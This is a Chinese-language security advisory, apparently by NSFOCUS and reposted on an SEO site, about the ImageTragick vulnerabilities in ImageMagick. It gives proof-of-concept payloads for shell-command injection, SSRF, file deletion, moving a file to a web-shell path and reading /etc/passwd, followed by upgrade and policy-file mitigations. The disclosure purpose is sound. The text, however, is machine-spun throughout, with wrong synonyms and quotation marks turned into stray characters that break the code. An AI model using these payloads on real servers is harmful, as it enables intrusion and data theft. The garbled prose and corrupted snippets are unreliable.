首页 » SEO优化 » imagetragickphp技巧_威胁预警ImageTragick分分钟让你网站掉守

imagetragickphp技巧_威胁预警ImageTragick分分钟让你网站掉守

访客 2024-11-19 0

扫一扫用手机浏览

文章目录 [+]

利用了ImageMagick软件的网站均会受到影响。

个中的漏洞信息列表如下:

imagetragickphp技巧_威胁预警ImageTragick分分钟让你网站掉守

CVE_ID

imagetragickphp技巧_威胁预警ImageTragick分分钟让你网站掉守
(图片来自网络侵删)

级别

描述

CVE-2016-3714

严重

Shell命令字符串过滤不严格导致(可能远程)代码实行

CVE-2016-3718

SSRF(做事器端要求假造)

CVE-2016-3715

文件删除

CVE-2016-3716

文件移动

CVE-2016-3717

本地文件读取

详情见如下地址:

http://www.openwall.com/lists/oss-security/2016/05/03/18

绿盟科技威胁预警级别

高等:影响范围比较广,危害严重,利用难度较低,724小时内部应急跟踪,24小时内完成技能剖析、产品升级和防护方案。

什么是ImageMagick?

ImageMagick软件是用C措辞编写的,可用来显示、转换以及编辑图形,支持超过200种图像文件格式,并且可以跨平台运行。

ImageMagick软件被许多编程措辞所支持,包括Perl,C++,PHP,Python和Ruby等,并被支配在数以百万计的网站,博客,社交媒体平台和盛行的内容管理系统(CMS)。

影响的版本

ImageMagick < 6.9.3-10

不受影响的版本

ImageMagick 6.9.3-10

漏洞影响

在ImageMagick软件的图片解码器中,存在多个漏洞,详细如下:

CVE_ID

描述

CVE-2016-3714

Shell命令字符串过滤不严格导致(可能远程)代码实行。

ImageMagick许可利用外部扩展库对文件进行处理,这种特色叫做“delegate”,通过利用system函数调用实现HTTPS的要求处理,对用户传入的shell参数没有做好过滤导致任意代码实行。

HTTPS要求:

\"大众wget\公众 -q -O \"大众%o\"大众 \"大众https:%M\"大众

%M为传入的真实链接,将其值更换如下:

'https://example.com\"大众;|ls \"大众-la'

则可以实行’ls -al’命令。

CVE-2016-3718

SSRF(做事器端要求假造)

有可能导致做事器发起HTTP GET或者FTP的要求。
push graphic-context

viewbox 0 0 640 480

fill 'url(http://example.com/)' //这里发起对外连接要求。

pop graphic-context

CVE-2016-3715

文件删除

通过ImageMagick的 'ephemeral'伪协议对文件进行读后删除。

push graphic-context

viewbox 0 0 640 480

image over 0,0 0,0 'ephemeral:/tmp/delete.txt' //这里发起文件删除

popgraphic-context

CVE-2016-3716

文件移动

通过ImageMagick的 'msl'伪协议实现任意移动图片文件到任意文件目录并将其命名成任意扩展名。

push graphic-context

viewbox 0 0 640 480

image over 0,0 0,0 'msl:/tmp/msl.txt' //处理msl脚本

popgraphic-context

/tmp/msl.txt内容如下:

<?xml version=\公众1.0\公众 encoding=\公众UTF-8\"大众?>

<image>

<read filename=\"大众/tmp/image.gif\"大众 />

<write filename=\公众/var/www/shell.php\"大众 />

</image>

CVE-2016-3717

本地文件读取

通过ImageMagick的 'label'伪协议获取文件内容。

push graphic-context

viewbox 0 0 640 480

image over 0,0 0,0 'label:@/etc/passwd'//读取/etc/passwd文件内容

pop graphic-context

修复方法

ImageMagick版本升级到6.9.3-10。

目前厂商已经发布了升级补丁修复了安全问题,请到厂商主页下载:

http://legacy.ImageMagick.org/script/binary-releases.php

验证文件的“magic bytes”,确定为期望的图片文件格式,详细文件格式的“magicbytes”参考如下网站:

https://en.wikipedia.org/wiki/List_of_file_signatures

利用策略文件禁用存在漏洞的编码器,全局策略文件常日位于“/etc/ImageMagick”,增加如下内容:

<policymap>

<policydomain=\公众coder\公众 rights=\"大众none\公众 pattern=\"大众EPHEMERAL\"大众/>

<policydomain=\"大众coder\公众 rights=\公众none\"大众 pattern=\"大众URL\"大众 />

<policydomain=\公众coder\"大众 rights=\"大众none\"大众 pattern=\"大众HTTPS\公众/>

<policydomain=\公众coder\"大众 rights=\"大众none\"大众 pattern=\"大众MVG\公众 />

<policydomain=\"大众coder\"大众 rights=\"大众none\"大众 pattern=\公众MSL\公众 />

</policymap>

本文由“135编辑器”供应技能支持

绿盟科技安全团队会持续关注事态变革,后续会发布详细的剖析报告、产品升级及办理方案,请广大用户随时关注。

绿盟科技威胁事宜定级标准

级别

描述

影响范围比较广,危害严重,利用难度较低,724小时内部应急跟踪,24小时内完成技能剖析、产品升级和防护方案。

影响范围可控,危害程度可控,利用难度较高,78小时内部应急跟踪,72小时内完成技能剖析、产品升级和防护方案。

影响较小,危害程度较小。

声明

本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告供应任何担保或承诺。

由于传播、利用此安全公告所供应的信息而造成的任何直接或者间接的后果及丢失,均由利用者本人卖力,绿盟科技以及安全公告作者不为此承担当何任务。

绿盟科技拥有对此安全公告的修正和解释权。
如欲转载或传播此安全公告,必须担保此安全公告的完全性,包括版权声明等全部内容。

未经绿盟科技许可,不得任意修正或者增减此安全公告内容,不得以任何办法将其用于商业目的。

关于绿盟科技

绿盟科技(NSFOCUS Co., Ltd.)是中国网络安全领域的领导企业,致力于网络和系统安全问题的研究、高端网络安全产品的研发、发卖与网络安全做事,在入侵检测/保护、远程评估、 DDoS攻击防护等方面供应具有国际竞争能力的前辈产品,是海内最具安全做事履历的专业公司。

有关绿盟科技的详情请拜会:

http://www.nsfocus.com

标签:

相关文章